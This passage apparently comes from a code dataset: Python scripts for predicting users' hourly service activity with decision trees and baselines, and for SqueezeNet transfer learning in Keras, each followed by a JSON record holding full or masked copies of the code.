(feature_test[i][0], feature_test[i][5]) key_1 = feature_test[i][0] if key_0 in service_hour: value_0 = service_hour[key_0] category_predict.append(value_0[0]) elif key_1 in service_past: value_1 = service_past[key_1] category_predict.append(value_1[0]) else: random_num = random.randint(0, len(service_type)-1) category_predict.append(service_type[random_num]) return category_predict # method 2: service in last week def conventional_method_Lweek(feature_train, feature_test, category_train): if len(feature_train[0]) != 7: print 'feature wrong' category_predict = ['FFF' for i in range(len(feature_test))] for i in range(len(feature_train)): sample = feature_train[i] user_id = sample[0] hour = sample[-2] date = sample[-1] if date == 0: # 0 means it is Sunday and should be the last date = 7 else: pass service_position = user_id * 168 + (date - 1) * 24 + hour category_predict[service_position] = category_train[i] return category_predict # decision tree def decision_tree(feature_train, feature_test, category_train): clf = tree.DecisionTreeClassifier() clf = clf.fit(feature_train, category_train) category_predict = clf.predict(feature_test) # the format of category_predict is weird category_Dtree = [] for item in category_predict: if item == 'F': category_Dtree.append('F') else: category_Dtree.append('O') return category_Dtree # random forests def random_forests(feature_train, feature_test, category_train): clf = RandomForestClassifier(n_estimators = 80) clf = clf.fit(feature_train, category_train) category_predict = clf.predict(feature_test) category_RF = [] for item in category_predict: if item == 'F': category_RF.append('F') else: category_RF.append('O') return category_RF # save user_activity as pkl file for migration.py def user_activity_save(user_activity, user_activity_path): output = open(user_activity_path, 'wb') pickle.dump(user_activity, output) output.close() # user_activity is for migration.py # key = user_id, range(1000), value = ['F', 'G'...], length is 7 * 24 = 168 def activity_restore(feature, category): if len(feature[0]) != 7: print 'feature wrong' user_activity = {} for i in range(USER_NUM): user_activity[i] = ['FFF' for j in range(168)] for i in range(len(feature)): sample = feature[i] user_id = sample[0] hour = sample[5] date = sample[-1] if date == 0: # 0 means it is Sunday and should be the last date = 7 else: pass position = (date - 1) * 24 + hour user_activity[user_id][position] = category[i] return user_activity def counting_accuate_rate(category_Dtree, category_test): on_on = 0 on_off = 0 off_on = 0 off_off = 0 print len(category_test) print len(category_Dtree) for i in range(21504): #(len(category_Dtree)): if category_Dtree[i] == 'O' and category_test[i] == 'O': on_on += 1 elif category_Dtree[i] == 'O' and category_test[i] == 'F': on_off += 1 elif category_Dtree[i] == 'F' and category_test[i] == 'O': off_on += 1 else: off_off += 1 print 'on_on' + '\t' + str(on_on) print 'on_off' + '\t' + str(on_off) print 'off_on' + '\t' + str(off_on) print 'off_off' + '\t' + str(off_off) # save file for sleep.py def save_file_for_sleep(category_predict, category_test): category_predict_path = '../data/category_predict_Dtree.pkl' category_test_path = '../data/category_test.pkl' output_1 = open(category_predict_path, 'wb') pickle.dump(category_predict, output_1) output_2 = open(category_test_path, 'wb') pickle.dump(category_test, output_2) output_1.close() output_2.close() if __name__ == '__main__': ''' activity_dict_path = '../data/activity_dict.pkl' activity_dict = get_activity_dict(activity_dict_path) train_dict_path = '../data/train_dict.pkl' test_dict_path = '../data/test_dict.pkl' user_id_index_path = '../data/user_id_index.pkl' data_segement(activity_dict, train_dict_path, test_dict_path, user_id_index_path) ''' train_dict_path = '../data/train_dict.pkl' test_dict_path = '../data/test_dict.pkl' user_id_index_path = '../data/user_id_index.pkl' train_dict, test_dict, user_id_index = get_data(train_dict_path, test_dict_path, user_id_index_path) profile_path = '../data/profile.pkl' profile = get_profile(profile_path) feature_train, feature_test, category_train, category_test = feature_build(train_dict, test_dict, profile, user_id_index) print 'feature_train sample: ' + str(feature_train[1000]) print 'feature_test sample: ' + str(feature_test[1000]) # decision tree category_Dtree = decision_tree(feature_train, feature_test, category_train) # random_forests #category_RF = random_forests(feature_train, feature_test, category_train) # conventional method: most-used service #category_Mused = conventional_method_Mused(feature_train, feature_test, category_train) # conventional method: last-week service #category_Lweek = conventional_method_Lweek(feature_train, feature_test, category_train) #cal_hit_rate(category_Dtree, category_test) #calculating_F_value(category_Dtree, category_test) #counting_accuate_rate(category_Dtree, category_test) #save_file_for_sleep(category_Dtree, category_test) # this part is for migration.py ''' # origin data, user_activity_origin is users' real behavior user_activity_origin_path = '../data/user_activity_test/user_activity_origin.pkl' user_activity_origin = activity_restore(feature_test, category_test) user_activity_save(user_activity_origin, user_activity_origin_path) ''' ''' # predition data using decision_tree user_activity_Dtree_path = '../data/user_activity_test/user_activity_Dtree.pkl' user_activity_Dtree = activity_restore(feature_test, category_Dtree) user_activity_save(user_activity_Dtree, user_activity_Dtree_path) ''' ''' # predition data according to users' most-used service user_activity_Mused_path = '../data/user_activity_test/user_activity_Mused.pkl' user_activity_Mused = activity_restore(feature_test, category_Mused) user_activity_save(user_activity_Mused, user_activity_Mused_path) ''' ''' # predition data according to users' last-week service user_activity_Lweek_path = '../data/user_activity_test/user_activity_Lweek.pkl' user_activity_Lweek = activity_restore(feature_test, category_Lweek) user_activity_save(user_activity_Lweek, user_activity_Lweek_path) '''
normal
{ "blob_id": "65c0d940bacc2d016121812c435cc60f3fc1ba90", "index": 7233, "step-1": "#!usr/bin/env python\r\n#-*- coding:utf-8 -*-\r\n\r\n# this model is for decision tree\r\n# objective: To cluster different service\r\n# JialongLi 2017/03/18\r\n\r\nimport re\r\nimport os\r\nimport sys\r\nimport pickle\r\nimport copy\r\nimport random\r\nimport pydotplus\r\n\r\n\r\nUSER_NUM = 1000\r\nreload(sys)\r\nsys.setdefaultencoding( \"utf-8\" )\r\nfrom sklearn import tree\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.cluster import KMeans\r\n\r\n# 0 represent Sunday, 1: Monday, 6: Saturday, 0: Sunday\r\nday_index = {'0507': 1, '0508': 2, '0509': 3, '0510': 4, '0511': 5, '0512': 6, '0513': 0, \r\n\t\t\t '0604': 1, '0605': 2, '0606': 3, '0607': 4, '0608': 5, '0609': 6, '0610': 0, \r\n\t\t\t '0702': 1, '0703': 2, '0704': 3, '0705': 4, '0706': 5, '0707': 6, '0708': 0, \r\n\t\t\t '0806': 1, '0807': 2, '0808': 3, '0809': 4, '0810': 5, '0811': 6, '0812': 0}\r\n\r\nservice_type = ['I', 'F', 'W', 'G', 'S', 'V']\r\n\r\n# get activity_dict\r\n# user's activity: default value is 'F'\r\n# format: {id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2}\r\ndef get_activity_dict(activity_dict_path):\r\n\tpkl_file = open(activity_dict_path, 'rb')\r\n\tactivity_dict = pickle.load(pkl_file)\r\n\tpkl_file.close()\r\n\treturn activity_dict\r\n\r\n# data are divided into train data and test data\r\n# first three weeks: train data; last week: test data\r\n# train_dict and test_dict are subset of activity_dict, id format is different\r\n# activity_dict format: {real id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2}\r\n# user_id_index: key = number, value = real id\r\ndef data_segement(activity_dict, train_dict_path, test_dict_path, user_id_index_path):\r\n\ttrain_dict = {}\r\n\ttest_dict = {}\r\n\tuser_count = 0\r\n\tuser_id_index = {}\r\n\tfor key_0, value_0 in activity_dict.items(): # key_0: real user_id\r\n\t\ttrain_dict[user_count] = {}\r\n\t\ttest_dict[user_count] = {}\r\n\t\tuser_id_index[user_count] = key_0\r\n\t\tfor key, value in value_0.items():\r\n\t\t\tif key[1] == '8': # data of August, test set\r\n\t\t\t\ttest_dict[user_count][key] = value\r\n\t\t\telse:\r\n\t\t\t\ttrain_dict[user_count][key] = value # train set\r\n\t\tuser_count += 1\r\n\r\n\toutput_1 = open(train_dict_path, 'wb')\r\n\tpickle.dump(train_dict, output_1)\r\n\toutput_2 = open(test_dict_path, 'wb')\r\n\tpickle.dump(test_dict, output_2)\r\n\toutput_3 = open(user_id_index_path, 'wb')\r\n\tpickle.dump(user_id_index, output_3)\r\n\toutput_1.close()\r\n\toutput_2.close()\r\n\toutput_3.close()\r\n\r\n# get train data and test data\r\n# train_dict, test_dict format: {number id_1:{'0507': [24/PERIOD], '0508': ['I', 'W', 'G']}, id_2}\r\ndef get_data(train_dict_path, test_dict_path, user_id_index_path):\r\n\tpkl_file_1 = open(train_dict_path, 'rb')\r\n\tpkl_file_2 = open(test_dict_path, 'rb')\r\n\tpkl_file_3 = open(user_id_index_path, 'rb')\r\n\ttrain_dict = pickle.load(pkl_file_1)\r\n\ttest_dict = pickle.load(pkl_file_2)\r\n\tuser_id_index = pickle.load(pkl_file_3)\r\n\tpkl_file_1.close()\r\n\tpkl_file_2.close()\r\n\tpkl_file_3.close()\r\n\treturn train_dict, test_dict, user_id_index\r\n\r\n# get profile\r\ndef get_profile(profile_path):\r\n\tpkl_file = open(profile_path, 'rb')\r\n\tprofile = pickle.load(pkl_file)\r\n\treturn profile\r\n\r\n# select different features\r\n# feature format: [user_id, gender, age, edu, job, hour, date], 7 features\r\n# profile: dict, {real user_id: [gender, age, edu, job]}\r\n# feature format: double list, outer list element is a sample: [number user_id, gender, age, edu, job, hour, date]\r\n# category format: list, element is service type, length = feature\r\ndef feature_select(data_dict, profile, user_id_index, is_over_sampling):\r\n\tfeature = []\r\n\tcategory = []\r\n\tover_sampling_num = 0\r\n\tfor user_id, all_dates in data_dict.items():\r\n\t\treal_user_id = user_id_index[user_id]\r\n\t\tone_user_profile = copy.deepcopy(profile[real_user_id]) # gender, age, edu, job\r\n\t\tone_user_profile.insert(0, user_id) # insert user_id\r\n\t\tfor date, activity in all_dates.items():\r\n\t\t\tfor i in range(len(activity)):\r\n\t\t\t\tif 1: #activity[i] != 'F': # do not add 'F'\r\n\t\t\t\t\tsample = copy.deepcopy(one_user_profile)\r\n\t\t\t\t\t#del(sample[1:4])\r\n\t\t\t\t\tsample.append(i) #(int(i/6)) # i represents hour\r\n\t\t\t\t\tsample.append(day_index[date]) # day_index: 7 days in one week\r\n\t\t\t\t\tfeature.append(sample)\r\n\t\t\t\t\t#category.append(activity[i])\r\n\t\t\t\t\tif activity[i] == 'F':\r\n\t\t\t\t\t\tcategory.append('F')\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcategory.append('O')\r\n\t\t\t\t\tif is_over_sampling and len(sample) > 5: # make sure that features are completed\r\n\t\t\t\t\t\tif activity[i] != 'F':\r\n\t\t\t\t\t\t\tsample_over = [[] for k in range(over_sampling_num)]\r\n\t\t\t\t\t\t\tfor j in range(over_sampling_num):\r\n\t\t\t\t\t\t\t\tsample_over[j] = copy.deepcopy(sample)\r\n\t\t\t\t\t\t\t\tsample_over[j][-3] = random.randint(0, 8) # random disturbance in job feature\r\n\t\t\t\t\t\t\t\tfeature.append(sample_over[j])\r\n\t\t\t\t\t\t\t\tcategory.append('O')\r\n\treturn feature, category\r\n\r\n# build features, all features\r\n# False means test data do not need over sampling\r\ndef feature_build(train_dict, test_dict, profile, user_id_index):\r\n\tfeature_train, category_train = feature_select(train_dict, profile, user_id_index, True)\r\n\tfeature_test, category_test = feature_select(test_dict, profile, user_id_index, False)\r\n\treturn feature_train, feature_test, category_train, category_test\r\n\r\n# calculating the hit rate\r\ndef cal_hit_rate(category_predict, category_test):\r\n\thit_count = 0\r\n\tsample_test_count = len(category_predict)\r\n\tfor i in range(sample_test_count):\r\n\t\tif category_predict[i] == category_test[i]:\r\n\t\t\thit_count += 1\r\n\thit_rate = float(hit_count) / float(sample_test_count)\r\n\tprint 'hit rate: ' + str(round(hit_rate, 4) * 100) + '%'\r\n\r\n# calculating F value\r\ndef calculating_F_value(category_predict, category_test):\r\n\tn_predict = 0\r\n\tn_origin = 0\r\n\thit_count = 0\r\n\tfor item in category_predict:\r\n\t\tif item != 'F':\r\n\t\t\tn_predict += 1\r\n\tfor item in category_test:\r\n\t\tif item != 'F':\r\n\t\t\tn_origin += 1\r\n\tfor i in range(len(category_predict)):\r\n\t\tif category_predict[i] != 'F' and category_predict[i] == category_test[i]:\r\n\t\t\thit_count += 1\r\n\tprecision = float(hit_count) / float(n_predict)\r\n\trecall = float(hit_count) / float(n_origin)\r\n\tF_value = 2 * precision * recall / (precision + recall)\r\n\tprint 'n_predict: ' + str(n_predict)\r\n\tprint 'n_origin: ' + str(n_origin)\r\n\tprint 'precision: ' + str(round(precision, 3))\r\n\tprint 'recall: ' + str(round(recall, 3))\r\n\tprint 'F_value: ' + str(round(F_value, 3))\r\n\r\n# 1. select the service type using most in that period in past days\r\n# 2. if user did not use service in that period before, select the service type using most in past days\r\n# 3. if user did not use service before, select service randomly \r\n# service_count_hour: key = (user_id, hour, service_type) value = count\r\n# service_count_past: key = (user_id, service_type) value = count\r\n# service_hour: key = (user_id, hour), value = [service_type, count]\r\n# service_past: key = user_id, value = [service_type, count]\r\ndef conventional_method_Mused(feature_train, feature_test, category_train):\r\n\tif len(feature_train[0]) != 7:\r\n\t\tprint 'feature wrong'\r\n\tservice_count_hour = {}\r\n\tservice_count_past = {}\r\n\tfor i in range(len(feature_train)):\r\n\t\tkey_hour = (feature_train[i][0], feature_train[i][5], category_train[i])\r\n\t\tif key_hour not in service_count_hour:\r\n\t\t\tservice_count_hour[key_hour] = 1\r\n\t\telse:\r\n\t\t\tservice_count_hour[key_hour] += 1\r\n\r\n\t\tkey_past = (feature_train[i][0], category_train[i])\r\n\t\tif key_past not in service_count_past:\r\n\t\t\tservice_count_past[key_past] = 1\r\n\t\telse:\r\n\t\t\tservice_count_past[key_past] += 1\r\n\r\n\tservice_hour = {}\r\n\tservice_past = {}\r\n\tfor key, value in service_count_hour.items():\r\n\t\tkey_hour = (key[0], key[1])\r\n\t\tif key_hour not in service_hour:\r\n\t\t\tservice_hour[key_hour] = [key[2], value]\r\n\t\telse:\r\n\t\t\tif value > service_hour[key_hour][1]:\r\n\t\t\t\tservice_hour[key_hour] = [key[2], value]\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\tfor key, value in service_count_past.items():\r\n\t\tkey_past = key[0]\r\n\t\tif key_past not in service_past:\r\n\t\t\tservice_past[key_past] = [key[1], value]\r\n\t\telse:\r\n\t\t\tif value > service_past[key_past][1]:\r\n\t\t\t\tservice_past[key_past] = [key[1], value]\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\r\n\tcategory_predict = []\r\n\tfor i in range(len(feature_test)):\r\n\t\tkey_0 = (feature_test[i][0], feature_test[i][5])\r\n\t\tkey_1 = feature_test[i][0]\r\n\t\tif key_0 in service_hour:\r\n\t\t\tvalue_0 = service_hour[key_0]\r\n\t\t\tcategory_predict.append(value_0[0])\r\n\t\telif key_1 in service_past:\r\n\t\t\tvalue_1 = service_past[key_1]\r\n\t\t\tcategory_predict.append(value_1[0])\r\n\t\telse:\r\n\t\t\trandom_num = random.randint(0, len(service_type)-1)\r\n\t\t\tcategory_predict.append(service_type[random_num])\r\n\r\n\treturn category_predict\r\n# method 2: service in last week\r\ndef conventional_method_Lweek(feature_train, feature_test, category_train):\r\n\tif len(feature_train[0]) != 7:\r\n\t\tprint 'feature wrong'\r\n\tcategory_predict = ['FFF' for i in range(len(feature_test))]\r\n\tfor i in range(len(feature_train)):\r\n\t\tsample = feature_train[i]\r\n\t\tuser_id = sample[0]\r\n\t\thour = sample[-2]\r\n\t\tdate = sample[-1]\r\n\t\tif date == 0: # 0 means it is Sunday and should be the last\r\n\t\t\tdate = 7\r\n\t\telse:\r\n\t\t\tpass\r\n\t\tservice_position = user_id * 168 + (date - 1) * 24 + hour\r\n\t\tcategory_predict[service_position] = category_train[i]\r\n\treturn category_predict\r\n\r\n# decision tree\r\ndef decision_tree(feature_train, feature_test, category_train):\r\n\tclf = tree.DecisionTreeClassifier()\r\n\tclf = clf.fit(feature_train, category_train)\r\n\tcategory_predict = clf.predict(feature_test) # the format of category_predict is weird\r\n\tcategory_Dtree = []\r\n\tfor item in category_predict:\r\n\t\tif item == 'F':\r\n\t\t\tcategory_Dtree.append('F')\r\n\t\telse:\r\n\t\t\tcategory_Dtree.append('O')\r\n\treturn category_Dtree \r\n\r\n# random forests\r\ndef random_forests(feature_train, feature_test, category_train):\r\n\tclf = RandomForestClassifier(n_estimators = 80)\r\n\tclf = clf.fit(feature_train, category_train)\r\n\tcategory_predict = clf.predict(feature_test)\r\n\tcategory_RF = []\r\n\tfor item in category_predict:\r\n\t\tif item == 'F':\r\n\t\t\tcategory_RF.append('F')\r\n\t\telse:\r\n\t\t\tcategory_RF.append('O')\r\n\treturn category_RF\r\n\r\n# save user_activity as pkl file for migration.py\r\ndef user_activity_save(user_activity, user_activity_path):\r\n\toutput = open(user_activity_path, 'wb')\r\n\tpickle.dump(user_activity, output)\r\n\toutput.close()\r\n\r\n# user_activity is for migration.py\r\n# key = user_id, range(1000), value = ['F', 'G'...], length is 7 * 24 = 168\r\ndef activity_restore(feature, category):\r\n\tif len(feature[0]) != 7:\r\n\t\tprint 'feature wrong'\r\n\tuser_activity = {}\r\n\tfor i in range(USER_NUM):\r\n\t\tuser_activity[i] = ['FFF' for j in range(168)]\r\n\tfor i in range(len(feature)):\r\n\t\tsample = feature[i]\r\n\t\tuser_id = sample[0]\r\n\t\thour = sample[5]\r\n\t\tdate = sample[-1]\r\n\t\tif date == 0: # 0 means it is Sunday and should be the last\r\n\t\t\tdate = 7\r\n\t\telse:\r\n\t\t\tpass\r\n\t\tposition = (date - 1) * 24 + hour\r\n\t\tuser_activity[user_id][position] = category[i]\r\n\treturn user_activity\r\n\r\ndef counting_accuate_rate(category_Dtree, category_test):\r\n\ton_on = 0\r\n\ton_off = 0\r\n\toff_on = 0\r\n\toff_off = 0\r\n\tprint len(category_test)\r\n\tprint len(category_Dtree)\r\n\tfor i in range(21504): #(len(category_Dtree)):\r\n\t\tif category_Dtree[i] == 'O' and category_test[i] == 'O':\r\n\t\t\ton_on += 1\r\n\t\telif category_Dtree[i] == 'O' and category_test[i] == 'F':\r\n\t\t\ton_off += 1\r\n\t\telif category_Dtree[i] == 'F' and category_test[i] == 'O':\r\n\t\t\toff_on += 1\r\n\t\telse:\r\n\t\t\toff_off += 1\r\n\tprint 'on_on' + '\\t' + str(on_on)\r\n\tprint 'on_off' + '\\t' + str(on_off)\r\n\tprint 'off_on' + '\\t' + str(off_on)\r\n\tprint 'off_off' + '\\t' + str(off_off)\r\n\r\n# save file for sleep.py\r\ndef save_file_for_sleep(category_predict, category_test):\r\n\tcategory_predict_path = '../data/category_predict_Dtree.pkl'\r\n\tcategory_test_path = '../data/category_test.pkl'\r\n\toutput_1 = open(category_predict_path, 'wb')\r\n\tpickle.dump(category_predict, output_1)\r\n\toutput_2 = open(category_test_path, 'wb')\r\n\tpickle.dump(category_test, output_2)\r\n\toutput_1.close()\r\n\toutput_2.close()\r\n\r\nif __name__ == '__main__':\r\n\t'''\r\n\tactivity_dict_path = '../data/activity_dict.pkl'\r\n\tactivity_dict = get_activity_dict(activity_dict_path)\r\n\ttrain_dict_path = '../data/train_dict.pkl'\r\n\ttest_dict_path = '../data/test_dict.pkl'\r\n\tuser_id_index_path = '../data/user_id_index.pkl'\r\n\tdata_segement(activity_dict, train_dict_path, test_dict_path, user_id_index_path)\r\n\t'''\r\n\r\n\ttrain_dict_path = '../data/train_dict.pkl'\r\n\ttest_dict_path = '../data/test_dict.pkl'\r\n\tuser_id_index_path = '../data/user_id_index.pkl'\r\n\ttrain_dict, test_dict, user_id_index = get_data(train_dict_path, test_dict_path, user_id_index_path)\r\n\tprofile_path = '../data/profile.pkl'\r\n\tprofile = get_profile(profile_path)\r\n\r\n\tfeature_train, feature_test, category_train, category_test = feature_build(train_dict, test_dict, profile, user_id_index)\r\n\tprint 'feature_train sample: ' + str(feature_train[1000])\r\n\tprint 'feature_test sample: ' + str(feature_test[1000])\r\n\r\n\t# decision tree\r\n\tcategory_Dtree = decision_tree(feature_train, feature_test, category_train)\r\n\r\n\t# random_forests\r\n\t#category_RF = random_forests(feature_train, feature_test, category_train)\r\n\r\n\t# conventional method: most-used service\r\n\t#category_Mused = conventional_method_Mused(feature_train, feature_test, category_train)\r\n\r\n\t# conventional method: last-week service\r\n\t#category_Lweek = conventional_method_Lweek(feature_train, feature_test, category_train)\r\n\r\n\r\n\t#cal_hit_rate(category_Dtree, category_test)\r\n\t#calculating_F_value(category_Dtree, category_test)\r\n\t\r\n\t#counting_accuate_rate(category_Dtree, category_test)\r\n\r\n\t#save_file_for_sleep(category_Dtree, category_test)\r\n\r\n\t# this part is for migration.py\r\n\t'''\r\n\t# origin data, user_activity_origin is users' real behavior\r\n\tuser_activity_origin_path = '../data/user_activity_test/user_activity_origin.pkl'\r\n\tuser_activity_origin = activity_restore(feature_test, category_test)\r\n\tuser_activity_save(user_activity_origin, user_activity_origin_path)\r\n\t'''\r\n\t'''\r\n\t# predition data using decision_tree\r\n\tuser_activity_Dtree_path = '../data/user_activity_test/user_activity_Dtree.pkl'\r\n\tuser_activity_Dtree = activity_restore(feature_test, category_Dtree)\r\n\tuser_activity_save(user_activity_Dtree, user_activity_Dtree_path)\r\n\t'''\r\n\t'''\r\n\t# predition data according to users' most-used service\r\n\tuser_activity_Mused_path = '../data/user_activity_test/user_activity_Mused.pkl'\r\n\tuser_activity_Mused = activity_restore(feature_test, category_Mused)\r\n\tuser_activity_save(user_activity_Mused, user_activity_Mused_path)\r\n\t'''\r\n\t'''\r\n\t# predition data according to users' last-week service\r\n\tuser_activity_Lweek_path = '../data/user_activity_test/user_activity_Lweek.pkl'\r\n\tuser_activity_Lweek = activity_restore(feature_test, category_Lweek)\r\n\tuser_activity_save(user_activity_Lweek, user_activity_Lweek_path)\r\n\t'''", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#adapted from https://github.com/DeepLearningSandbox/DeepLearningSandbox/tree/master/transfer_learning import os import sys import glob import argparse import matplotlib.pyplot as plt from keras.applications.imagenet_utils import preprocess_input from keras.models import Model from keras.layers import GlobalAveragePooling2D,Dropout,Convolution2D,Activation from keras.preprocessing.image import ImageDataGenerator from keras.optimizers import SGD from squeezenet import fire_module,SqueezeNet IM_WIDTH, IM_HEIGHT = 227, 227 #fixed size for squeezenet NB_EPOCHS = 3 BAT_SIZE = 32 def get_nb_files(dir): if not os.path.exists(dir): return 0 cnt = 0 for r,dirs,files in os.walk(dir): for dr in dirs: cnt += len(glob.glob(os.path.join(r,dr+"/*"))) return cnt def setup_to_transfer_learn(model): """Freeze all layers and compile the model""" for layer in model.layers: layer.trainable = False #model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) def add_new_last_layer(base_model, nb_classes): x = base_model.output x = Dropout(0.5, name='drop9')(x) x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x) x = Activation('relu', name='relu_conv10')(x) x = GlobalAveragePooling2D()(x) predictions = Activation('softmax')(x) return Model(inputs=base_model.input, outputs=predictions) def setup_to_finetune(model): #5 layers in final output, 7 layers per fire module, finetune last 4 fire modules = 28 + 5 = 33 layers unfrozen #67 layers total, 0-indexed #layers 0-33 should be frozen, layers 34-66 trainable #layer 26 = finetune last 5 fire modules for layer in model.layers[:11]: layer.trainable=False for layer in model.layers[11:]: layer.trainable=True model.compile(optimizer=SGD(lr=0.0001,momentum=0.9),loss='categorical_crossentropy',metrics=['accuracy']) def train(args): nb_train_samples = get_nb_files(args.train_dir) nb_classes = len(glob.glob(args.train_dir + "/*")) nb_val_samples = get_nb_files(args.val_dir) nb_epoch = int(args.nb_epoch) batch_size = int(args.batch_size) steps_per_epoch = nb_train_samples/batch_size validation_steps = nb_val_samples/batch_size train_datagen = ImageDataGenerator( preprocessing_function=preprocess_input ) test_datagen = ImageDataGenerator( preprocessing_function=preprocess_input ) train_generator = train_datagen.flow_from_directory( args.train_dir, target_size = (IM_WIDTH,IM_HEIGHT), batch_size = batch_size, shuffle=True ) val_generator = test_datagen.flow_from_directory( args.val_dir, target_size = (IM_WIDTH,IM_HEIGHT), batch_size = batch_size, shuffle=True ) base_model = SqueezeNet() setup_to_transfer_learn(base_model) model = add_new_last_layer(base_model,nb_classes) #sgd = SGD(lr=0.001,decay=0.0002,momentum=0.9) #model.compile(optimizer=sgd,loss='categorical_crossentropy',metrics=['accuracy']) model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) history_tl = model.fit_generator( generator=train_generator, epochs=nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=val_generator, validation_steps = validation_steps, class_weight="auto" ) setup_to_finetune(model) history_ft = model.fit_generator( generator=train_generator, epochs=nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=val_generator, validation_steps=validation_steps, class_weight="auto" ) model.save(args.output_model_file) if args.plot: plot_training(history_ft) def plot_training(history): acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epochs = range(len(acc)) plt.plot(epochs, acc, 'r.') plt.plot(epochs, val_acc, 'r') plt.title('Training and validation accuracy') plt.savefig("accuracy_plot.png") plt.close() plt.plot(epochs, loss, 'r.') plt.plot(epochs, val_loss, 'r-') plt.title('Training and validation loss') plt.savefig("loss_plot.png") if __name__=="__main__": a = argparse.ArgumentParser() a.add_argument("--train_dir") a.add_argument("--val_dir") a.add_argument("--nb_epoch", default=NB_EPOCHS) a.add_argument("--batch_size", default=BAT_SIZE) a.add_argument("--output_model_file", default="inceptionv3-ft.model") a.add_argument("--plot", action="store_true") args = a.parse_args() if args.train_dir is None or args.val_dir is None: a.print_help() sys.exit(1) if (not os.path.exists(args.train_dir)) or (not os.path.exists(args.val_dir)): print("directories do not exist") sys.exit(1) train(args)
normal
{ "blob_id": "39b9106a3b0305db8cc7316be3b76e58e5577b92", "index": 4980, "step-1": "<mask token>\n\n\ndef setup_to_transfer_learn(model):\n \"\"\"Freeze all layers and compile the model\"\"\"\n for layer in model.layers:\n layer.trainable = False\n\n\ndef add_new_last_layer(base_model, nb_classes):\n x = base_model.output\n x = Dropout(0.5, name='drop9')(x)\n x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x)\n x = Activation('relu', name='relu_conv10')(x)\n x = GlobalAveragePooling2D()(x)\n predictions = Activation('softmax')(x)\n return Model(inputs=base_model.input, outputs=predictions)\n\n\ndef setup_to_finetune(model):\n for layer in model.layers[:11]:\n layer.trainable = False\n for layer in model.layers[11:]:\n layer.trainable = True\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss=\n 'categorical_crossentropy', metrics=['accuracy'])\n\n\ndef train(args):\n nb_train_samples = get_nb_files(args.train_dir)\n nb_classes = len(glob.glob(args.train_dir + '/*'))\n nb_val_samples = get_nb_files(args.val_dir)\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n steps_per_epoch = nb_train_samples / batch_size\n validation_steps = nb_val_samples / batch_size\n train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n train_generator = train_datagen.flow_from_directory(args.train_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n val_generator = test_datagen.flow_from_directory(args.val_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n base_model = SqueezeNet()\n setup_to_transfer_learn(base_model)\n model = add_new_last_layer(base_model, nb_classes)\n model.compile(optimizer='rmsprop', loss='categorical_crossentropy',\n metrics=['accuracy'])\n history_tl = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n setup_to_finetune(model)\n history_ft = model.fit_generator(generator=train_generator, epochs=\n nb_epoch, steps_per_epoch=steps_per_epoch, validation_data=\n val_generator, validation_steps=validation_steps, class_weight='auto')\n model.save(args.output_model_file)\n if args.plot:\n plot_training(history_ft)\n\n\ndef plot_training(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n epochs = range(len(acc))\n plt.plot(epochs, acc, 'r.')\n plt.plot(epochs, val_acc, 'r')\n plt.title('Training and validation accuracy')\n plt.savefig('accuracy_plot.png')\n plt.close()\n plt.plot(epochs, loss, 'r.')\n plt.plot(epochs, val_loss, 'r-')\n plt.title('Training and validation loss')\n plt.savefig('loss_plot.png')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_nb_files(dir):\n if not os.path.exists(dir):\n return 0\n cnt = 0\n for r, dirs, files in os.walk(dir):\n for dr in dirs:\n cnt += len(glob.glob(os.path.join(r, dr + '/*')))\n return cnt\n\n\ndef setup_to_transfer_learn(model):\n \"\"\"Freeze all layers and compile the model\"\"\"\n for layer in model.layers:\n layer.trainable = False\n\n\ndef add_new_last_layer(base_model, nb_classes):\n x = base_model.output\n x = Dropout(0.5, name='drop9')(x)\n x = Convolution2D(nb_classes, (1, 1), padding='valid', name='conv10')(x)\n x = Activation('relu', name='relu_conv10')(x)\n x = GlobalAveragePooling2D()(x)\n predictions = Activation('softmax')(x)\n return Model(inputs=base_model.input, outputs=predictions)\n\n\ndef setup_to_finetune(model):\n for layer in model.layers[:11]:\n layer.trainable = False\n for layer in model.layers[11:]:\n layer.trainable = True\n model.compile(optimizer=SGD(lr=0.0001, momentum=0.9), loss=\n 'categorical_crossentropy', metrics=['accuracy'])\n\n\ndef train(args):\n nb_train_samples = get_nb_files(args.train_dir)\n nb_classes = len(glob.glob(args.train_dir + '/*'))\n nb_val_samples = get_nb_files(args.val_dir)\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n steps_per_epoch = nb_train_samples / batch_size\n validation_steps = nb_val_samples / batch_size\n train_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input)\n train_generator = train_datagen.flow_from_directory(args.train_dir,\n target_size=(IM_WIDTH, IM_HEIGHT), batch_size=batch_size, shuffle=True)\n val_generator = 